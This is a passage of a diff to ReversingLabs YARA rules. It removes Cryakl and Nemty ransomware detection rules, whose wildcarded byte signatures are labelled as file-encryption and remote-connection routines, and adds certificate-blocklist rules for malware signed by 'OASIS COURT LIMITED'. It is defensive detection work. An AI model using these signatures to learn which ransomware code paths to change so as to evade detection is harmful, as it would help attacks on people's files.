 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Cryakl"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_and_encrypt_files_1 = {
-            8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
-            30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 74 ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ??
-            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 83 E0 ?? 83 F8 ?? 75 ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 10 FF 92 ?? ?? ?? ??
-            84 C0 0F 84 ?? ?? ?? ?? FF 75 ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
-        }
-		$enum_and_encrypt_files_2 = {
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ??
-            ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ??
-            C6 45 ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 10 FF 52 ?? 8B D8
-            4B 85 DB 0F 8C ?? ?? ?? ?? 43 33 F6 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 8D ??
-            ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B D6 8B 38 FF 57 ?? 8B
-            85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 75 ?? C6 45 ?? ??
-            46 4B 0F 85 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 A1 ?? ?? ??
-            ?? 50 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ??
-            ?? 83 C0 ?? 83 D2 ?? 89 05 ?? ?? ?? ?? 89 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ??
-            ?? ?? 8B 10 FF 92 ?? ?? ?? ?? 84 C0 75 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $enum_and_encrypt_files_* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OASIS COURT LIMITED" and ( pe.signatures [ i ] . serial == "00:e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" or pe.signatures [ i ] . serial == "e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" ) and 1608508800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Nemty : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_E953Ada7E8F1438E5F7680Ff599Ae43E : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Nemty ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c56ecd32-5903-5bcc-aa69-a070f2c247c4"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "2bce88d4-24e6-59e5-ae02-5284ec43cfa4"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Nemty.yara#L1-L205"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11900-L11918"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "dc8cfdcdea8ecb2018b1b04bb1b645f6dbdc6c07357719100677c75945edef40"
+		logic_hash = "7cb7d77abefd35f0756c5aa0983f7403cca4cbacd94dcc6b510c929bc96c8309"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Nemty"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 33 DB 68 ?? ?? ?? ?? 8D 75
-            ?? 89 5D ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00
-            53 53 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 6A
-            ?? 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ??
-            ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 53 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
-            ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 32 DB EB ?? B3 ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ??
-            6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ??
-            ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 8B 1D ?? ?? ?? ??
-            50 FF D3 6A ?? 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59
-            72 ?? 8B 00 50 FF D3 33 DB 43 53 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 53 8D 75 ??
-            E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 59 59 FF 75 ?? FF
-        }
-		$remote_connection_p2 = {
-            D6 FF 75 ?? FF D6 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ??
-            83 78 ?? ?? 59 59 72 ?? 8B 00 50 FF 15 ?? ?? ?? ?? 53 33 FF 8D 75 ?? E8 ?? ?? ?? ??
-            53 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ??
-            ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 33 C9 51 51 51 50 68 ?? ?? ?? ?? 51 FF 15 ??
-            ?? ?? ?? 53 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 53 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 5A 8B C1 39 55 ?? 73 ?? 8D 45 ?? 03 45 ?? 39 55 ??
-            73 ?? 8D 4D ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41 3B C8 75 ?? 8B 45 ?? 39 55 ?? 73 ??
-            8D 45 ?? 03 45 ?? 8B 4D ?? 39 55 ?? 73 ?? 8D 4D ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41
-            3B C8 75 ?? 8B 45 ?? 39 55 ?? 73 ?? 8D 45 ?? 03 45 ?? 8B 4D ?? 39 55 ?? 73 ?? 8D 4D
-            ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41 3B C8 75 ?? 83 EC ?? 8D 45 ?? 8B F4 50 E8 ?? ??
-            ?? ?? 83 EC ?? 8B F4 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 33
-            FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$enum_resources_p1 = {
-            55 8B EC 83 E4 ?? 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 53 56 57 FF 15 ?? ?? ??
-            ?? 83 64 24 ?? ?? 89 44 24 ?? BB ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? D3 EA 33 C0 40
-            23 D0 0F 84 ?? ?? ?? ?? 83 64 24 ?? ?? 6A ?? 80 C1 ?? 5F 88 4C 24 ?? FF 74 24 ?? 8D
-            74 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 83 64 24 ?? ?? 8B 74 24 ?? 53 89
-            7C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 59 03 C6 8D 4C 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D
-            44 24 ?? 50 83 C8 ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53 8B C6
-            E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8B C6 50 FF 15 ?? ?? ?? ?? 6A ?? 33
-            FF 8D 74 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59
-            8B F8 53 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
-            33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53
-            8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
-        }
-		$enum_resources_p2 = {
-            8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D
-            74 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53 8D 44 24
-            ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ??
-            E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24 ?? 6A ?? 8D 4C 24 ?? 51 8D
-            4C 24 ?? 51 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 0F AC C8 ?? 89 44 24 ?? 8D
-            44 24 ?? BE ?? ?? ?? ?? C1 E9 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 0F AC C8 ??
-            89 44 24 ?? 8D 44 24 ?? BE ?? ?? ?? ?? C1 E9 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 2B 44 24
-            ?? 8B 4C 24 ?? 1B 4C 24 ?? BE ?? ?? ?? ?? 0F AC C8 ?? 89 44 24 ?? 8D 44 24 ?? C1 E9
-            ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? FF 44 24 ?? 83 7C 24 ?? ??
-            0F 8C ?? ?? ?? ?? 8B 4C 24 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_files_1_p1 = {
-            6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0
-            0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ??
-            E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ??
-            59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ??
-            ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84
-        }
-		$find_files_1_p2 = {
-            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ??
-            ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ??
-            ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ??
-            ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ??
-            ?? ?? 59 84 C0 75 ?? 83 EC ?? 8D 44 24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ??
-            FF 15
-        }
-		$find_files_2_p1 = {
-            8D 44 24 ?? 8D 8C 24 ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84
-            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F
-            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ??
-            ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6
-            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 8D
-            84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 57 8D 84 24 ?? ?? ?? ?? 50 FF D6
-            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
-        }
-		$find_files_2_p2 = {
-            50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0
-            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? E8 ??
-            ?? ?? ?? 83 4C 24 ?? ?? 83 EC ?? 8B C4 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 4C
-            24 ?? 8B C4 51 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 84 24 ?? ??
-            ?? ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 83 4C 24 ?? ?? 83 EC ?? 8B C4 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? 8B C4 51 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ??
-            83 C4 ?? 85 C0 75 ?? 32 DB EB ?? B3 ?? F6 44 24 ?? ?? 74 ?? 83 64 24 ?? ?? 6A ?? 33
-            FF 8D 74 24 ?? E8 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 83 64 24 ?? ?? 6A ?? 33 FF 8D 74
-        }
-		$find_files_2_p3 = {
-            24 ?? E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? F6 84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ??
-            ?? ?? 50 0F 84 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F0 8B
-            46 ?? 59 83 C9 ?? 2B C8 83 F9 ?? 0F 86 ?? ?? ?? ?? 8D 58 ?? 6A ?? 8B C6 E8 ?? ?? ??
-            ?? 84 C0 74 ?? 83 7E ?? ?? 8B 4E ?? 72 ?? 8B 06 EB ?? 8B C6 6A ?? 5A 66 89 14 48 83
-            7E ?? ?? 89 5E ?? 72 ?? 8B 06 EB ?? 8B C6 33 C9 66 89 0C 58 8B DE 8D 74 24 ?? E8 ??
-            ?? ?? ?? 8B DE 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33 FF E8 ?? ?? ?? ?? 6A ?? 8D 74 24
-            ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 44 24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44
-            24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 44 24 ?? E8
-            ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 59 6A ?? 33 FF 8D 74 24 ?? E8
-            ?? ?? ?? ?? 6A ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 40 33 C9 8D 74 24 ?? E8 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? E8 ?? ??
-            ?? ?? 59 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 40 33 C9
-            8D 74 24 ?? E8
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 8B D9 33 F6 C7 43 ??
-            ?? ?? ?? ?? 89 73 ?? C6 03 ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 57 2B C1 6A ?? 99 5F
-            F7 FF 89 9D ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 85 C0 74 ?? 89 B5 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 83 EC ?? 03 C1 8B F4 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A
-            ?? 50 83 C8 ?? 8B F3 E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
-            ?? 8B 0D ?? ?? ?? ?? 2B C1 6A ?? 99 5E F7 FE FF 85 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ??
-            39 85 ?? ?? ?? ?? 72 ?? 8B 53 ?? 6A ?? 5F C6 85 ?? ?? ?? ?? ?? 3B D7 72 ?? 8B 0B EB
-            ?? 8B CB 8B 43 ?? 03 C1 3B D7 72 ?? 8B 0B EB ?? 8B CB 50 51 8D 85 ?? ?? ?? ?? 50 8D
-            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 39 7B ?? 72 ?? 8B 03 EB ?? 8B C3 8B 5B ?? 8B
-            B5 ?? ?? ?? ?? 03 D8 53 FF B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B
-            4E ?? C6 85 ?? ?? ?? ?? ?? 3B CF 72 ?? 8B 16 EB ?? 8B D6 8B 46 ?? 03 C2 3B CF 72 ??
-            8B 0E EB ?? 8B CE 50 51 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 39 7E ?? 72 ?? 8B 0E EB ?? 8B CE 8B 46 ?? 03 C1 50 FF B5 ?? ?? ?? ?? 8D 9D ?? ??
-            ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 46 ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4E
-        }
-		$encrypt_files_p2 = {
-            89 85 ?? ?? ?? ?? 3B CF 72 ?? 8B 16 EB ?? 8B D6 8B 46 ?? 03 C2 3B CF 72 ?? 8B 0E EB
-            ?? 8B CE 3B C8 74 ?? 8B B5 ?? ?? ?? ?? 2B F1 8A 11 88 14 0E 41 3B C8 75 ?? 8D 45 ??
-            50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 75 ?? 8B F8 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 8D 45 ?? E8 ?? ?? ?? ?? 8B F0 8B 46 ?? 8B 56 ?? 59 59 8B 4F ?? 2B C2 3B C8 76 ??
-            8B 47 ?? 2B C1 3B C2 72 ?? 56 8B F7 E8 ?? ?? ?? ?? EB ?? 6A ?? 57 83 C8 ?? E8 ?? ??
-            ?? ?? 8B D8 8D 75 ?? E8 ?? ?? ?? ?? 8B C6 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 33 DB 53 68 ?? ?? ?? ?? 6A ?? 53 53 68 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8
-            ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 3B F3 74 ?? 53 53 53 56
-            FF 15 ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 56 FF
-            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 59 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-
 	condition:
